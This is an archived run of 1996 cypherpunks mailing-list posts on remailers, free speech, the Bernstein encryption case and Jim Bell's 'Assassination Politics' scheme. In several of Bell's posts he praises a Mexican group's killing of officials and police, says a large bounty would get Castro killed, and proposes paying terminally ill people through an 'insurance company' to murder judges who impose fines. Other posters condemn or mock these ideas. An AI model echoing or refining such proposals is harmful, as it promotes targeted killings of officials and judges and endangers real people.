much for free speech. Do you think people distributing bomb-making material should be held responsible for any terrorist incidents. Quite a few people on this list who posted bomb-making material would be arrested. Same with chemistry book publishers and news magazines that had some pretty detailed information about pipe bombs. I fail to see any difference between the two. > I consider AP to be very close to calling for the assasination of the > President of the USA. That is a federal crime and there is a law that > requires the investigation of any such threats. I suggest that people > think *very* carefully before engaging in this dangerous nonsense any > further. Do you really consider speech to be "dangerous." The law requiring investigation of threats against the president is a stupid one. The maintainer of the exploding head page was investigated by the USSS after putting up computer-generated pictures of Bob Dole's head exploding (Presidential candidates are also covered under this law). There's too much potential for abuse. > PS it is not censorship to stop people from advocating murder. Then all prosecuters pushing for the death penalty, death penalty advocates, and anyone who advocates going to war with another country should all be thrown in jail. I might as well ask the common question again: "What part of 'Congress shall make no law' don't you understand?" Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMkRcaizIPc7jvyFpAQFEcAgAhJr/0veZSx/nX+DNQK/mov53sJzQo8f/ dF7DOTahAII8HX0ysKfJ3qJ/bQMZBXh3e47c0WdX/Mze6/4rinBdDp2aYgc1Xnvc wMkD3Wm+LFuYlJ0Dq3TcUddgEzOd3CYgl2IQVHVx8qs3900qF4b/HQiiGnt+k9A5 Id2k1CQW+CfuGRGB2hBaqltLOY+62qHqwocGoHKB0j5S11mBuekFxYf/JfhMRncN MsaFOZz8HT9n/w78Lz358lU7jxsDJdpkPOJ5bD3I5BKnUuVlJlCsENkvwJtws98E 8thG++TqpeqcB8vHYZ+soj52TMeC5WEaFAcL0d5Hzf/O0gKXSs22pA== =L3sm -----END PGP SIGNATURE----- From m5 at vail.tivoli.com Sat Sep 21 16:32:21 1996 From: m5 at vail.tivoli.com (Mike McNally) Date: Sun, 22 Sep 1996 07:32:21 +0800 Subject: Going AP Shit on the Internet In-Reply-To: <3.0b16.32.19960921133414.0069a754@www.ctrl-alt-del.com> Message-ID: <32445A8B.2483@vail.tivoli.com> Black Art wrote: > > How many "hits" would John Tesh have gotten after the Olympics? > > How many "hits" would Urkel get after anyone actually watched him > on TV? > > These powers could be used for good or evil! Those are examples of good uses, right? ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From mcguirk at indirect.com Sat Sep 21 16:43:59 1996 From: mcguirk at indirect.com (Dan McGuirk) Date: Sun, 22 Sep 1996 07:43:59 +0800 Subject: Where to write crypto? In-Reply-To: Message-ID: On Sat, 21 Sep 1996, Dan McGuirk wrote: > If I want to go to a country outside the United States to write > cryptographic code that will be freely distributable, what's the best > place to go? Or, on the other hand, is there no way that a U.S. citizen can legally do this? From tcmay at got.net Sat Sep 21 16:51:08 1996 From: tcmay at got.net (Timothy C. May) Date: Sun, 22 Sep 1996 07:51:08 +0800 Subject: "Remailers can't afford to be choosy" Message-ID: Without going back and reviewing my precise words in my first post on this topic, I don't think Lance is doing anything unreasonable. My comment was more to the point that a lot of the talk I see about filtering topics, looking at content, blah blah blah, is basically inconsistent with the basic concept of a "digital mix," a la Chaum. At 7:19 PM 9/21/96, Lance Cottrell wrote: >One important differentiation to make is filtering on form vs. filtering on >content. Most if not all remailers have clear usage guidelines. These >indicate several form restrictions on what messages the remailer is >offering to transmit. These restrictions may be on message size, >instruction formatting, number of destinations for one message, or number >of identical messages. These restrictions are no more censorship than >restricting messages to SMTP compliant ascii. > >Where people do not follow the stated rules, I take action to enforce them. >Either by source blocking the abuser if known, destination blocking the >destination, or trying to apply public pressure. I think all these actions >are completely reasonable, given that the proper use guidelines were >clearly defined up front. It is similar to putting up a fence around your >yard when people start hanging out there uninvited. Clearly stating policies is fair enough. In the future, with a rich ecology of remailers, I would expect many kinds of remailers with many kinds of policies, prices, etc. Still, it is always useful to remember that a remailer is first and foremost a _remailer_, not an inspector of content to determine appropriateness of topics, whether a receiver "wants" a remailed message, etc. (None of the main "physical remailers," e.g., the US Postal Service, Federal Express, UPS, Airborne, etc., offer "destination-blocking" or even "source-blocking" services. Of course, they charge some form of fee for remailing. And there is nominally a return address (albeit easily bypassed/spoofed).) >Are you suggesting that I not take perfectly legal and open actions to >enforce the public statement of allowed uses of my remailer? No. I think clearly stated policies are perfectly legit. What I was getting at with my "remailers can't afford to be choosy" point was a more general point that sometimes seems to get lost in the discussions, namely, that remailers will, perforce, be used for lots of unpopular, disgusting, flamish, etc. uses. Not all remailer uses are noble whisteblowings (*). (* In fact, some whistleblowings are amongst the most "most illegal" uses! The person within General Dynamics who uses a remailer to describe contract fraud in the Tomahawk Cruise Missile program is almost certainly putting the remailer operator under intense pressure, just as is a person using a remailer to post the Church of Scientology NOTS documents. To me, they are the same. Hence, "remailers can't afford to be choosy.") --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Sat Sep 21 17:24:58 1996 From: tcmay at got.net (Timothy C. May) Date: Sun, 22 Sep 1996 08:24:58 +0800 Subject: Death Threats Message-ID: (I don't know what the hell this thread has to do with "[NOISE] Kiddie porn on the Internet," so I've changed the name.) At 9:22 PM 9/21/96, Mark M. wrote: >Do you really consider speech to be "dangerous." The law requiring >investigation of threats against the president is a stupid one. The maintainer >of the exploding head page was investigated by the USSS after putting up >computer-generated pictures of Bob Dole's head exploding (Presidential >candidates are also covered under this law). There's too much potential for >abuse. Hey, I'm a candidate for President, too (at least I know of someone who plans to vote for me). Does this mean I am protected against various threats, and veiled threats? Let me know, as I seem to be under attack by certain Russian-developed spambots. More seriously, the whole set of protections the President has is inconsistent with our nominally anti-royalist approach. Of course, America long ago created its own royalty. Even dynasties (how else do you explain Teddy Kennedy getting away with the Mary Jo Kopechne thing?). Actively (and plausibly) threatening _anyone_ is a kind of crime (*), but there is no reason to make special laws covering certain persons. (* Why do I say "actively (and plausibly) threatening _anyone_ is a kind of crime"? Don't I believe in free speech? Well, if I hear that Vladimir G. Nulis says I should be killed, and that he is coming to California to take care of this, I have no compunctions, liberrarian or otherwise, about shooting first at the first sign of his appearance on my property. Understandably, the government does not wish this to happen. Thus, I have no problem with illegalizing direct and concrete threats. General threats, such as "all lawyers should be taken out into the parking lot and garotted" are not specific, direct, and concrete, and hence fall under the free speech provisions.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From loki at infonex.com Sat Sep 21 17:37:14 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 22 Sep 1996 08:37:14 +0800 Subject: Macintosh Mixmaster port... Who's doing it? In-Reply-To: Message-ID: At 11:57 AM -0700 9/18/96, Myers W. Carpenter wrote: > Does anyone have any idea who might be attempting a Macintosh >Mixmaster port? I and some other people were eyeing the idea. If you know >who might be doing this port I would appreciate hearing from them. > Thanks. > myers Several individuals have offered to port Mixmaster. To the best of my knowledge, none are still working on it. As the author and a Mac user I would be happy to answer questions, and test the system. I have no Mac programing experience though. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From alano at teleport.com Sat Sep 21 18:19:00 1996 From: alano at teleport.com (Alan Olsen) Date: Sun, 22 Sep 1996 09:19:00 +0800 Subject: CNET Digital Dispatch Vol. 2 No. 38 Message-ID: <3.0b16.32.19960921155903.00c51bac@mail.teleport.com> The individual who posted the C-Net top ten missed the crypto-related parts of that issue. (I guess the humor section is all that people read on C-Net...) Here is what he missed... >Hook up your new system to the Net, and use it to remake >yourself. Get a virtual nose ring. Program your avatar with >all the attributes you wish you had. On the Internet, your >image is up to you. What will yours be? Read Editor-in-Chief >Christopher Barr's views on online identity: > >http://www.cnet.com/Content/Voices/Barr/091696/index.html > >Maybe you're not ready to share your identity. Maybe that's >the furthest thing from your mind. If you've got secrets to >keep, you need to know about Pretty Good Privacy, the de >facto encryption standard for email. Our tutorial will tell >you how to get PGP software and how to use it: > >http://www.cnet.com/Content/Features/Howto/Privacy/index.html > >Then be sure to read our update on mover and shaker Philip >Zimmerman, the guy who invented PGP: > >http://www.cnet.com/Content/Voices/Movers/zimmermann.html --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises." From jimbell at pacifier.com Sat Sep 21 18:29:37 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 09:29:37 +0800 Subject: Kiddie porn on the Internet Message-ID: <199609212321.QAA07044@mail.pacifier.com> At 01:34 PM 9/21/96 -0400, hallam at vesuvius.ai.mit.edu wrote: > >[AP drivel deleted] > >Go talk to someone who is a member of an organisation like the PLO or >Hammas and pretty near the top. If you think that they would be intimidated >for a moment by AP you have another think comming. It depends entirely on what you mean by "intimidated." AP would make them pretty damn useless, because instead of the typical Palestiniation having to depend on a few corrupt self-chosen leaders, they could get their revenge on an individual basis. Who needs PLO or Hamas under such circumstances? Besides, the Israelis (as well as resentful Palestinians) could get rid of abusive PLO or Hamas leadership using AP. > >If it could the US would have assasinated Saddam by now. No, because the leadership in the US who would either choose such a system (or not) well understand that people who live in glass palaces shouldn't start throwing rocks against the enemy leadership. > It can't because it >is too difficult to find out where exactly a person will be. Assasination >attempts against Castro similarly failed. Assassination can easily fail if you don't give the proper people the motivation to accomplish the task. The key to having it work out is to ensure that the few people who have access to the target are sufficiently motivated to collect the reward. Who, exactly, was given a motivation to kill Castro? A few clowns in Miami? A few crooks in Jersey? Give _everybody_ who meets Castro during the day a $10 million motivation to kill him, and he'll be dead before sunset. >If you care to look at the history of Cambodia you will see that Lon Nol >assumed the presidency despite the knowledge that there was practically no ch >chance of defeating the Khumer Rouge and that he would almost certainly be dead >in less than a week as a result. > >Both the assumption AP rests on are utterly false. It is neither possible >to assasinate people at will nor will it intimidate. Since it's never been tried before, how do you know? >In addition *ANYONE* who attempted to implement AP would be someone *I* >would regard as a tyrant and therefore a legitimate target by the rules >of AP. I don't doubt that there will be many people who misunderstand AP. You're obviously one of them. I would naturally consider it permissable to engage the support of >others in their suppression. Since we now live in the fantasy land of AP >I can now wipe out anyone anywhere so I eliminate all AP leaders. > > >I think that this type of talk is incredibly dangerous. There are plenty of >people on the net who are psychos and if you spread AP drivel arround someone >is going to act on it. Probably not Jim Bell, more likely a psychopath who >lurks on the list but does not post. Pardon me, but what's wrong with this? Follow the news more closely, and you'll hear of a group which is operating in southern Mexico, the "EPR," which is killing off government employees, politicians, and police. True, they're not implementing the mathematical, digital-cash basis behind AP, but they see to be making good progress against the corruption which is Mexico. Increase their productivity by a factor of 10, and the Mexican government would be terrified. Increase it by 100, and the Mexican government would fall within a few months. >If you call for people to be murdered - and let us not forget that this is >what AP is about you bear the responsibility when someone acts on it. Does that make YOU responsible if, by calling for people to NOT kill their oppressors, they continue to suffer oppression? >I consider AP to be very close to calling for the assasination of the >President of the USA. That is a federal crime and there is a law that >requires the investigation of any such threats. I suggest that people >think *very* carefully before engaging in this dangerous nonsense any >further. > > Phill >PS it is not censorship to stop people from advocating murder. Then you obviously don't understand the meaning of the word, "censorship." Jim Bell jimbell at pacifier.com From jimbell at pacifier.com Sat Sep 21 18:29:40 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 09:29:40 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: <199609212321.QAA07036@mail.pacifier.com> At 01:51 PM 9/17/96 -0700, Steve Schear wrote: >>On Mon, 16 Sep 1996, Steve Schear wrote: >> >>> Someone wrote: >>> We've all heard these arguments, but are they true? Who says so, and how >>> can they be certain? Jim's suggestion has never, to my knowledge, been >>> tried on a consistant, large, scale. When all conventional alternatives >>> have been tried and fail, what have we or the starving children got to >>> lose? >> >>I think "Lord of the Flies" answers this question quite well. > >Does it? LOTF was fiction. Can you identify a recent instance in which a >non-governmental organization attempted to influence political/military >events via a concerted AP? As you understand, I really have to question anybody who would take an extraordinarily contrived work of fiction like LOTF and exrtrapolate from it as some sort of "answer" to AP. However, Unicorn is sufficiently confused that it's not surprising that this would come from him. While it's been well over two decades since I read it, LOTF engages in the artifice of separating out a handful of near-pre-adolescent boys, who don't seem to get along particularly well while stuck on an island after being shot down during a war. (Presumably, WWII.) It's hard to understand what kind of lesson we could learn from this, particularly since one person's opinion of what might happen should such an extraordinary and unlikely event occur can't be all that more significant or valuable than another. Or, what if such an event actually happened, and the outcome was quite different? What would that say about Golding's opinions? Or, suppose a similar event occurred, but instead of a dozen boys it was a co-ed college's students, or a few geriatrics, or a family, or a few middle-aged women, or...what? What, exactly, are we learning from one specific speculation that Golding happened to want to commit to paper? Unfortunately (or, perhaps _fortunately_?) I don't think we're going to hear from Unicorn why he thinks one particular dime novel is any more revelational about human behavior than any other. Jim Bell jimbell at pacifier.com From drose at AZStarNet.com Sat Sep 21 18:49:56 1996 From: drose at AZStarNet.com (David M. Rose) Date: Sun, 22 Sep 1996 09:49:56 +0800 Subject: FCC's Hundt calls for univ service for Net, nixes iphone regs Message-ID: <199609212323.QAA23452@web.azstarnet.com> On Fri, 20 Sep 1996, Tim May wrote: [...] >The Constitutional issues of free speech would remain mostly unchanged even ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >if "universal access" happens, but the government would definitely get more >of a foot in the door than it has now. I really hope that this is the case, and that some restraint would be exercised. But when the FCC has historically concerned itself with channels of communication, the 1st Am has typically been tossed out of the window. Recall the "seven dirty words" brouhaha. Perhaps they've lightened up. I can imagine Herr Hundt and his FCC fellows looking on fondly and indulgently as cute-as-a-button sitcom kids inform their network TV show parents more frequently than we've heard "fuckhead" on this list that they "suck." I seem to recall somewhere in the dim dark past that the expression "you suck" would have been subsumed under the "fighting words" statutes, implying, as it does, that the object of the utterer's scorn was either homosexual or a woman who casually performed fellation. If the FCC approves of "you suck" on network television, perhaps there is yet hope that the perverse topics daily discussed on c-punks would, at least temporarily, be allowed. Dave Rose drose at azstarnet.com ____________________________________ "Take this Uzi from a crack baby's hands, and put in a computer--that's our demands" -J. Jackson "Cover your mouth when you sneeze, that'll help the solution" -Mavis, Roebuck "Pops" Staples & the family From loki at infonex.com Sat Sep 21 18:55:31 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 22 Sep 1996 09:55:31 +0800 Subject: Pseudonym server: Jenaer Anonymous Service In-Reply-To: <199609011109.NAA14105@jengate.thur.de> Message-ID: At 2:37 PM -0700 9/1/96, Lutz Donnerhacke wrote: >* stewarts at ix.netcom.com wrote: >It's strongly recomment to use a reply server to forward your requests to. >The server sends all outgoing messages via mixmaster chains. >(mixmaster at as-node.jena.thur.de can is always the first one in the chain). > This is very important. You don't want to send it your real address to deliver to. I strongly recommend using alt.anonymous.messages. A program called "newscan" is ideal for checking news based message pools. It scans news on a server of your choice, and saves messages based on criteria that you specify. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From jimbell at pacifier.com Sat Sep 21 18:57:40 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 09:57:40 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <199609212340.QAA07773@mail.pacifier.com> At 02:03 PM 9/18/96 -0700, John Gilmore wrote: >Judge Patel to Decide if Government Restrictions on >Cryptography Violate the First Amendment >San Francisco, CA -- On Friday, September 20, 1996, Judge Marilyn Hall >Patel will hold hearings in a case with far-reaching implications for >personal privacy, U.S. competitiveness, and national security. Mathematician >Daniel J. Bernstein, a Research Assistant Professor in the Department of >Mathematics, Statistics and Computer Science at the University of Illinois at >Chicago, has sued several Federal agencies on the grounds that the >agencies' requirement that he obtain a license prior to publishing his >ideas about cryptography violates his First Amendment right to freedom >of speech. [trimmed] >LEGAL ARGUMENTS > >* Any legal framework that allows a government bureaucrat to >censor speech before it happens is an unconstitutional prior restraint. >The government is not allowed to set up such a drastic scheme >unless they can prove that publication of such information will >"surely result in direct, immediate, and irreparable damage to our >Nation or its people" and that the regulation at issue is necessary >to prevent this damage. At the risk of being a devil's advocate, let me suggest that you are conceding too much even with the preceding paragraph. The 1st amendment says nothing about preventing speech which (even admittedly) would result in "direct, immediate, and irreparable damage to our nation or its people." Indeed, if you follow the news over the last 5-10 years, you see numerous examples of news items getting publicized (sometimes 30-40 years late) which might arguably have cause "irreparable damage." That recent revelation about the POWs being left in Korea would have been one such example. The intentional detonation of that H-bomb in 1954, knowing that prevailing winds would shower thousands of people with fallout was another. The US military's experimentation with chemical weapons on our own people after WWII is another. The fraud of the Gulf of Tonkin Resolution is another. The Pentagon Papers incident is another. The Tuskeegee syphillis experiments on blacks which ended in 1972 was another. The massive pollution at decomissioned military bases. The Iran/Contra arms smuggling deals, along with the cocaine smuggling stories which are more recently being pursued, are yet another. I could list many more, but won't because of lack of space. But notice that, presumably, each and every one of these incidents was AT ONE TIME kept secret, arguably because it would be better for the country to do so. Thus, presumably it was thought or at least asserted that to reveal them would cause "damage to our nation or its people." The way you've written the paragraph I've quoted above, it appears that you are somehow acknowleding that there are certain circumstances where certain types of speech are controllable because they are "harmful," but you fail to explain how even this constitutional restiction is tolerable. Frankly, I don't see it! What you need to do is to be far more specific about such speech and exactly where it can be controlled. I should point out, also, that this is the second time I've mentioned this. You're doing us a disservice if you concede too much in this area. Jim Bell jimbell at pacifier.com From loki at infonex.com Sat Sep 21 18:59:31 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 22 Sep 1996 09:59:31 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu> Message-ID: I am setting up just such a list. I plan to award products for both excellent and lousy crypto. This really should be a committee (yuch) effort, so if you would like to participate, please let me know. -Lance At 5:01 PM -0700 9/17/96, Krenn wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >It would be nice to have a list of actual products which are deemed >potential snake-oil. Such a list could be maintained anonymously >through a nym to avoid all the annoying legal problems with commenting >on another's product. Though truth is the best defense against libel >charges, it would be very annoying to be sued or some such by some >hairbrained snake-oil peddler. > >Krenn > >-----BEGIN PGP SIGNATURE----- >Version: 2.6.2 > >iQCVAwUBMj84gEnqfwPpt/QVAQEWZAP9EZ7+3dQol+ZBLYQIiEk8f8avKDje5LBh >EmE5GVxFXDgD9wAmcccMMuVxxCaUhN0kc8Q4StQ4aZGjwdrCGouHq4aNJdd73ERP >vuk+VpQrlUwSvwwPlfXKUIQrM1PHfNigXrS5OrsQe/H/GjLw2lFa/WI2urR2Cuqg >oMmtuQKrJik= >=r2wq >-----END PGP SIGNATURE----- ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From loki at infonex.com Sat Sep 21 19:22:17 1996 From: loki at infonex.com (Lance Cottrell) Date: Sun, 22 Sep 1996 10:22:17 +0800 Subject: Snake-Oil FAQ In-Reply-To: <199609180001.UAA24489@anon.lcs.mit.edu> Message-ID: At 8:00 AM -0700 9/18/96, Mark Rogaski wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >An entity claiming to be Krenn wrote: >: >: It would be nice to have a list of actual products which are deemed >: potential snake-oil. Such a list could be maintained anonymously >: through a nym to avoid all the annoying legal problems with commenting >: on another's product. Though truth is the best defense against libel >: charges, it would be very annoying to be sued or some such by some >: hairbrained snake-oil peddler. >: > >I think a blacklist of that sort is inherently bad. I would much rather >have the public be able to RECOGNIZE SYMPTOMS of snake oil, rather than >just be spoon fed a list of good products vs. bad products. Pardon the >cliche, but if you give a man a fish ... etc, etc. > >mark > I agree in principle, but for the foreseeable future I think the list will be a "good thing". -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From jya at pipeline.com Sat Sep 21 19:49:56 1996 From: jya at pipeline.com (John Young) Date: Sun, 22 Sep 1996 10:49:56 +0800 Subject: USA_exe (Kiddie porn on the Internet) Message-ID: <199609220023.AAA29950@pipe4.ny3.usa.pipeline.com> On Sep 21, 1996 16:19:53, 'jim bell ' wrote: >Pardon me, but what's wrong with this? Follow the news more closely, and >you'll hear of a group which is operating in southern Mexico, the "EPR," which >is killing off government employees, politicians, and police. True, they're >not implementing the mathematical, digital-cash basis behind AP, but they see >to be making good progress against the corruption which is Mexico. >Increase their productivity by a factor of 10, and the Mexican government would >be terrified. Increase it by 100, and the Mexican government would fall within >a few months. Jim's makes a good, if gruesome, point here, about the vicious realities of do-or-die AP, by even our own apple pie government. The Washington Post reports at length today on the Defense Department's disclosure yesterday of heretofore classified trainging manuals used in the School of the Americas to instruct Latino troops on killing a wide range of civilians for political purposes. To read "Army Instructed Latins On Executions, Torture," about your tax dollars working the AP angle: http://jya.com/usaexe.txt USA_exe From jya at pipeline.com Sat Sep 21 19:51:22 1996 From: jya at pipeline.com (John Young) Date: Sun, 22 Sep 1996 10:51:22 +0800 Subject: USA_exe (Kiddie porn on the Net) Message-ID: <199609220037.AAA23283@pipe2.ny1.usa.pipeline.com> On Sep 21, 1996 16:19:53, 'jim bell ' wrote: >Pardon me, but what's wrong with this? Follow the news more closely, and >you'll hear of a group which is operating in southern Mexico, the "EPR," which >is killing off government employees, politicians, and police. True, they're >not implementing the mathematical, digital-cash basis behind AP, but they see >to be making good progress against the corruption which is Mexico. >Increase their productivity by a factor of 10, and the Mexican government would >be terrified. Increase it by 100, and the Mexican government would fall within >a few months. -------- Jim's makes a good, if gruesome, point here, about the vicious realities of do-or-die AP, by even our own apple pie government. The Washington Post reports at length today on the Defense Department's disclosure yesterday of heretofore classified trainging manuals used in the School of the Americas to instruct Latino troops on killing a wide range of civilians for political purposes. To read "Army Instructed Latins On Executions, Torture," about your tax dollars working the AP angle: http://jya.com/usaexe.txt USA_exe From dthorn at gte.net Sat Sep 21 20:10:57 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 22 Sep 1996 11:10:57 +0800 Subject: Kiddie porn on the Internet In-Reply-To: <9609211734.AA15897@vesuvius.ai.mit.edu> Message-ID: <32448DF8.5208@gte.net> hallam at vesuvius.ai.mit.edu wrote: > Go talk to someone who is a member of an organisation like the PLO or > Hammas and pretty near the top. If you think that they would be > intimidated for a moment by AP you have another think comming. > If it could the US would have assasinated Saddam by now. It can't > because it is too difficult to find out where exactly a person will > be. Assasination > attempts against Castro similarly failed. > If you care to look at the history of Cambodia you will see that Lon > Nol assumed the presidency despite the knowledge that there was > practically no chance of defeating the Khumer Rouge and that he would > almost certainly be dead > in less than a week as a result. > Both the assumption AP rests on are utterly false. It is neither > possible to assasinate people at will nor will it intimidate. > In addition *ANYONE* who attempted to implement AP would be someone > *I* would regard as a tyrant and therefore a legitimate target by the > rules of AP. I would naturally consider it permissable to engage the > support of others in their suppression. Since we now live in the > fantasy land of AP I can now wipe out anyone anywhere so I eliminate > all AP leaders. > I think that this type of talk is incredibly dangerous. There are > plenty of people on the net who are psychos and if you spread AP > drivel arround someone is going to act on it. Probably not Jim Bell, > more likely a psychopath who > lurks on the list but does not post. > If you call for people to be murdered - and let us not forget that > this is what AP is about you bear the responsibility when someone acts > on it. > I consider AP to be very close to calling for the assasination of the > President of the USA. That is a federal crime and there is a law that > requires the investigation of any such threats. I suggest that people > think *very* carefully before engaging in this dangerous nonsense any > further. Come now, surely you don't think putting assassination into the hands of the common people (Democracy, yes? The same stuff Clinton is preaching all the time, remember?) is going to be worse than letting governments control all the action? If you're going to allow governments to do the job, you and your fellow citizens should have been more involved in the political arena, to monitor these kinds of activities, so the government (of the U.S., for example) didn't have to get such a bad reputation. A few years ago, William Torbitt (pseudonym) wrote in part: "Penal codes have had two historic purposes - to deter crime and reform the offender. .....However, when the head of the National Police agency joins with a handful of other govt. leaders, and they both in turn throw in with organized crime to murder the president, and the people have an uneasy feeling that something of this nature has taken place, it is only natural that crime and violence increase, and the basic deterrent to crime has broken down." (quote approximate) From jimbell at pacifier.com Sat Sep 21 20:45:18 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 22 Sep 1996 11:45:18 +0800 Subject: The GAK Momentum is Building... Message-ID: <199609220058.RAA10810@mail.pacifier.com> At 01:58 PM 9/20/96 -0400, Black Unicorn wrote: >On Wed, 18 Sep 1996, Dale Thorn wrote: >> My comment: Once the big Corp.'s get used to the new game, they'll put >> the non-critical stuff out there for Mr. Freeh, and for the really >> secret data, if the cops confiscate anything they can't read, the Corp. >> security will put it off on a fall-guy, even as high as the CEO if >> necessary. I just wanna see one case where a federal judge will try to >> bleed a big company for contempt for "refusing" to decode and hand over >> some ostensibly encrypted data. Matter of fact, there are probably cases >> similar to this that have already been through the appeals courts. > >Several. Most involve foreign banks refusing to turn over records to U.S. >courts. Most result in powerfully large fines imposed on banks, often on >a per diem basis. But as usual, you ignore the obvious solution to the problem. Let's suppose the amount of the fine is set at $1000 per day. Actuarially, this works out to be the interest (at 5% per year) on $7.3 million dollars in principle. In other words, if you can eliminate the fine for less than $7.3 million, you're better off doing it. Naturally, you won't even consider the possibility of going outside the system to solve a problem. The rest of us notice that there are probably thousands of terminally-ill people who would gladly act as a human kamikaze and get rid of any judge inclined to impose such a fine, for a payment of 1% of this principle amount to a family member or loved one, leaving 99% available for the few other judges foolish enough to basically commit suicide by taking up a futile gesture. This kind of operation is best arranged by what might be described as an "insurance company," which will divide the risk among client companies until everyone learns what the score really is. It wouldn't take long before no such fines are ever imposed. But nah, this is much too complex for you. Jim Bell jimbell at pacifier.com From mblvd at telebase.com Sat Sep 21 21:12:45 1996 From: mblvd at telebase.com (mblvd at telebase.com) Date: Sun, 22 Sep 1996 12:12:45 +0800 Subject: Music Boulevard Birthday Sale - 10% Off! Message-ID: <199609220154.VAA21581@telebase.com.> Dear Music Boulevard User: Come to the Music Boulevard Birthday Blowout Sale! All CDs are 10% off of our already discounted prices. The sale is going on now, but will only last for a limited time, so make sure you visit http://www.musicblvd.com soon! The World Wide Web's ultimate online music store, Music Boulevard allows music lovers around the world to quickly and easily purchase products and learn about their favorite artists in an exciting and entertaining multimedia environment. Users can browse through a massive catalog of more than 150,000 different music titles, read artist biographies and discographies, check out album reviews, view cover artwork and listen to the Internet's largest selection of audio samples. Thank you, Music Boulevard Staff p.s. If you don't want to receive messages like this in the future, please send us a note at service at musicblvd.com with the word 'remove' in the subject line. From tcmay at got.net Sat Sep 21 21:13:35 1996 From: tcmay at got.net (Timothy C. May) Date: Sun, 22 Sep 1996 12:13:35 +0800 Subject: The GAK Momentum is Building... Message-ID: At 1:56 AM 9/22/96, jim bell wrote: >But as usual, you ignore the obvious solution to the problem. Let's suppose >the amount of the fine is set at $1000 per day. Actuarially, this works out .... >Naturally, you won't even consider the possibility of going outside the >system to solve a problem. The rest of us notice that there are probably >thousands of terminally-ill people who would gladly act as a human kamikaze ... I get the feeling that the "standard form letter" for all such invocations of AP is turning out to be: "Suppose you owe somebody money. It is much cheaper just to use AP to have him killed." Indeed, this "simple" solution is ever so much cheaper than paying a fine, repaying a loan, fulfilling an obligation, whatever. (P.S. The hiring of terminally-ill kamikazes is an old one.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Sat Sep 21 21:31:00 1996 From: tcmay at got.net (Timothy C. May) Date: Sun, 22 Sep 1996 12:31:00 +0800 Subject: William Torbitt (pseudonym) Message-ID: At 12:53 AM 9/22/96, Dale Thorn wrote: >A few years ago, William Torbitt (pseudonym) wrote in part: "Penal codes >have had two historic purposes - to deter crime and reform the offender. >.....However, when the head of the National Police agency joins with a >handful of other govt. leaders, and they both in turn throw in with >organized crime to murder the president, and the people have an uneasy >feeling that something of this nature has taken place, it is only >natural that crime and violence increase, and the basic deterrent to >crime has broken down." (quote approximate) Presumably the same William Torbitt (psuedonym) who wrote the Samizdat-distributed "Nomenclature of an Assassination Cabal." (One of the best treatments of the various swirling connections surrounding the JFK assassination and 